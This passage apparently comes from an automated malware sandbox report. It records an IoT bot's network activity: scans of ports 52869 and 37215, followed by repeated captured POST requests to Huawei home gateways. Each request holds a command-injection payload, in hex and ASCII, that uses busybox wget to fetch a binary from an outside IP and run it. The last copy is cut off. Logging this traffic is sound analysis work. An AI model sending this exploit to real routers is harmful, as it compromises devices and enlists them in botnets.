Source: unknown	Network traffic detected: HTTP traffic on port 44512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53954
Source: unknown	Network traffic detected: HTTP traffic on port 53958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53958
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52738 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34680 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42850 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44520 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51628 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53696 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45424 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33774
Source: unknown	Network traffic detected: HTTP traffic on port 45428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33780
Source: unknown	Network traffic detected: HTTP traffic on port 49118 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic	TCP traffic: 197.132.5.65 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 185.68.235.176 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 91.156.37.23 ports 2,5,6,8,9,52869

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 